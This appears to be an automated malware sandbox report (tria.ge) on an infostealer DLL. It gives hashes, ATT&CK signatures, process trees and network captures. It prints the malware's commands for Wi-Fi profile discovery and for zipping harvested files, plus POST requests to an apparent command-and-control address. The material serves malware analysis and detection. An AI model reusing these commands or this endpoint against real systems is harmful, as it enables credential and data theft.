Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/12/2024, 02:55 UTC

General

  • Target

    532182c6dcf52d5ce0bc271e94b13e83019fd8d09afdc5e68d985a092b250203.dll

  • Size

    1.2MB

  • MD5

    6f25f0506bf49fe7f35686ed1f8fef4a

  • SHA1

    e5596d4c2b924bc93755558e447d1a04d19efdfe

  • SHA256

    532182c6dcf52d5ce0bc271e94b13e83019fd8d09afdc5e68d985a092b250203

  • SHA512

    5d93f84c6d80430ee853e7ef20cce4235effc1ba49f860c358c16eaad1c762e74b67dd9aa4c7e1996b38da07c2c601ebdcaf8dba9d4b594c19b92db589ec18ae

  • SSDEEP

    24576:Usd+7fzBMqZjh2sntUcCy8LfunZzW8IFHcDVh1QhHAO:U3BHjh2OZ80ZzHIF85L

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\532182c6dcf52d5ce0bc271e94b13e83019fd8d09afdc5e68d985a092b250203.dll,#1
    1⤵
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2456
    • C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      2⤵
      • Event Triggered Execution: Netsh Helper DLL
      • System Network Configuration Discovery: Wi-Fi Discovery
      PID:1996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\437139445115_Desktop.zip' -CompressionLevel Optimal
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2492

Network

  • flag-ru
    POST
    http://185.215.113.209/Fru7Nk9/index.php
    rundll32.exe
    Remote address:
    185.215.113.209:80
    Request
    POST /Fru7Nk9/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.209
    Content-Length: 21
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 19 Dec 2024 02:56:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-ru
    POST
    http://185.215.113.209/Fru7Nk9/index.php?wal=1
    rundll32.exe
    Remote address:
    185.215.113.209:80
    Request
    POST /Fru7Nk9/index.php?wal=1 HTTP/1.1
    Content-Type: multipart/form-data; boundary=----NzI3NjA=
    Host: 185.215.113.209
    Content-Length: 72920
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 19 Dec 2024 02:56:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    209.113.215.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.113.215.185.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    209.113.215.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.113.215.185.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    86.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    86.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    68.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    68.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.211.185.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.211.185.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    154.239.44.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    154.239.44.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    197.87.175.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    197.87.175.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    97.188.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.188.18.2.in-addr.arpa
    IN PTR
    Response
    97.188.18.2.in-addr.arpa
    IN PTR
    a2-18-188-97deploystaticakamaitechnologiescom
  • flag-us
    DNS
    19.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    13.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.173.189.20.in-addr.arpa
    IN PTR
    Response
  • 185.215.113.209:80
    http://185.215.113.209/Fru7Nk9/index.php?wal=1
    http
    rundll32.exe
    112.3kB
    18.2kB
    931
    374

    HTTP Request

    POST http://185.215.113.209/Fru7Nk9/index.php

    HTTP Response

    200

    HTTP Request

    POST http://185.215.113.209/Fru7Nk9/index.php?wal=1

    HTTP Response

    200
  • 8.8.8.8:53
    209.113.215.185.in-addr.arpa
    dns
    148 B
    134 B
    2
    1

    DNS Request

    209.113.215.185.in-addr.arpa

    DNS Request

    209.113.215.185.in-addr.arpa

  • 8.8.8.8:53
    217.106.137.52.in-addr.arpa
    dns
    146 B
    147 B
    2
    1

    DNS Request

    217.106.137.52.in-addr.arpa

    DNS Request

    217.106.137.52.in-addr.arpa

  • 8.8.8.8:53
    86.49.80.91.in-addr.arpa
    dns
    70 B
    145 B
    1
    1

    DNS Request

    86.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    68.159.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    68.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    133.211.185.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    133.211.185.52.in-addr.arpa

  • 8.8.8.8:53
    154.239.44.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    154.239.44.20.in-addr.arpa

  • 8.8.8.8:53
    197.87.175.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    197.87.175.4.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    97.188.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    97.188.18.2.in-addr.arpa

  • 8.8.8.8:53
    19.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    19.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    13.173.189.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    13.173.189.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\437139445115_Desktop.zip

    Filesize

    71KB

    MD5

    36c67ec0a9ad650b8e0c0f80d11177ec

    SHA1

    ca5714d78c62f1a7b3fc3fe99da49e64847484cb

    SHA256

    3b648cee93734e0f7be0d3858a3109bf275d7fe52543a6409b4ae9fa0e46ff66

    SHA512

    d824af534f1f07a274e37c573d8f83594b6b9d69e80950534afa1312b28ebc65a960c0405ba5ede8c5a9513cefb231b609d71aba40ec241af577d2907c6e2309

  • C:\Users\Admin\AppData\Local\Temp\_Files_\AssertInvoke.docx

    Filesize

    18KB

    MD5

    fd80231e47eda2148753be7caa821bbb

    SHA1

    00dbadaab2b4788c32e2e5bb251039ec172448bf

    SHA256

    1cf25b42ebf7dd7d2149ed0a637ab4ca3dec4fd7d7dccd045aa1c97f0591eaa6

    SHA512

    ad0a197a0cdeb37afa72ebb87d425680829e9af821b9ecda031d8b52c6d4e4863f3dd8e2056d83c334ddab12630a96d3d290eb7857181021883b936647f90581

  • C:\Users\Admin\AppData\Local\Temp\_Files_\DismountRead.xlsx

    Filesize

    10KB

    MD5

    742392c03406698ec77c9a16936e5363

    SHA1

    ebfa964cf89848d40ef21549d4bfed7efa5b43dd

    SHA256

    3acd2168b8a851b1fdd4f6640090f2a3fdeed8ffaffe3256c035d19fcf5819f7

    SHA512

    d49032fab0efbc0b5a76e748089e9f12e103e33db1d8cb4bc91c8ee352d7f4207c1ad6b141fa46ecf6ebab68320f86c1a6bee41658ff9d0b6c70d184176e1529

  • C:\Users\Admin\AppData\Local\Temp\_Files_\ImportHide.docx

    Filesize

    15KB

    MD5

    5d38fc77abbf3ed291d97db068ebae95

    SHA1

    781e99affd9f8f0746c9de34825dacebfd0a966a

    SHA256

    e3b6ecc2514e24ce2dd68feebaeb00a9d3e3d4c24779b72c132e8c530702d8db

    SHA512

    31cf38f8960f62d2bf49a25b15b737df581a620ab60f5582099e6a3b67b9264555d7fdbb36fdaf9fb750be8d9b5915d435506bf382e294ca78032075c9103591

  • C:\Users\Admin\AppData\Local\Temp\_Files_\ImportSearch.xlsx

    Filesize

    13KB

    MD5

    f476fd07a8a977060f93964e2104cc11

    SHA1

    7a8edcbe65de4318996cedb66f22159d6611ff37

    SHA256

    4ae0e7db0ba08de070125ad265195c6d8795cb057e061e16af77d49e1f495b5d

    SHA512

    2e8df89e01842385ce779a571a9d4079275bf6465a97ac5d5e1bfb825b6e7d71e52c60e240796627faffc31fa2d5d1da375b398afdd37e75ebbba3eefd83cdbd

  • C:\Users\Admin\AppData\Local\Temp\_Files_\LockExpand.docx

    Filesize

    16KB

    MD5

    bee930a7354714601938a8932dbc6f27

    SHA1

    0a8157b32e68997aa6f88cbf48ff1217bf84d20e

    SHA256

    f9efc6828b9461ead81834076de8948a3399c7bc398babd315c03ecca03c31f6

    SHA512

    487f9afd9a06d153d81c00812b685b07a233a7417653c59eff46f4dec3b124134b08c20fc14ac86e4ad494f9769326373d15df1611b86462fb82266ea4da8bf1

  • C:\Users\Admin\AppData\Local\Temp\_Files_\UndoRevoke.xlsx

    Filesize

    11KB

    MD5

    ca82c42fa0861e48a8d4d7a3b08d892f

    SHA1

    f6a6c4bdee8b01a2fb4980424068457f0e54d3be

    SHA256

    bb84e6b82e7d9f3c4117e9bb138f35150b3dfa5432be4935b294f6546f05f2bb

    SHA512

    a93b968dc39158627edda3480df049dab38b9c3d92253dc2ddaa01cead873ddd1b38b66dc371a7ee27ec5c5d6233e35fde38cb0b48131314b822e3753f2d241f

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tqaewkoa.m1i.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2492-17-0x00007FFBAD000000-0x00007FFBADAC1000-memory.dmp

    Filesize

    10.8MB

  • memory/2492-20-0x000002574CCD0000-0x000002574CCDA000-memory.dmp

    Filesize

    40KB

  • memory/2492-19-0x000002574D070000-0x000002574D082000-memory.dmp

    Filesize

    72KB

  • memory/2492-18-0x00007FFBAD000000-0x00007FFBADAC1000-memory.dmp

    Filesize

    10.8MB

  • memory/2492-6-0x00007FFBAD003000-0x00007FFBAD005000-memory.dmp

    Filesize

    8KB

  • memory/2492-30-0x00007FFBAD000000-0x00007FFBADAC1000-memory.dmp

    Filesize

    10.8MB

  • memory/2492-7-0x000002574CCE0000-0x000002574CD02000-memory.dmp

    Filesize

    136KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.